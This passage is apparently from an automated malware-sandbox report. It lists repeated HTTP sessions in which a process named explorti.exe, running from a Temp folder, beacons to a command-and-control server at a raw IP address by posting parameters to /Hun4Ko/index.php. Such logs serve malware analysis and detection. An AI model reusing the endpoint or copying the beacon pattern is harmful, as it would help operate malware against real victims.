                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:22.410031080 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            38192.168.2.46393077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:22.521938086 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:23.237962008 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:23.238913059 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:23.464132071 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:23 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            39192.168.2.46393177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:23.584609985 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:24.300184965 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:24.300921917 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:24.525402069 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            40192.168.2.46393277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:24.647836924 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:25.339652061 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:25.340579033 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:25.559257030 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:25 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            41192.168.2.46393377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:25.680912018 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:26.406002045 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:26.407082081 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:26.635916948 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:26 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            42192.168.2.46393477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:26.756609917 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:27.452573061 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:27.454024076 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:27.675362110 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:27 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            43192.168.2.46393577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:27.788130999 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:28.590279102 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:28.591120005 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:28.805778980 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:28 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            44192.168.2.46393677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:28.912863016 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:29.646506071 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:29.647347927 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:29.876985073 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:29 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            45192.168.2.46393777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:29.990866899 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:30.694075108 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:30.696002960 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:30.919255018 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:30 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            46192.168.2.46393877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:31.038101912 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:31.744141102 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:31.745578051 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:31.965464115 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            47192.168.2.46393977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:32.086745024 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:32.774749994 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:32.775573969 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:32.991377115 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            48192.168.2.46394077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:33.100260973 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:33.783843040 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:33.784805059 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:33.999643087 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            49192.168.2.46394177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:34.115863085 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:34.819909096 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
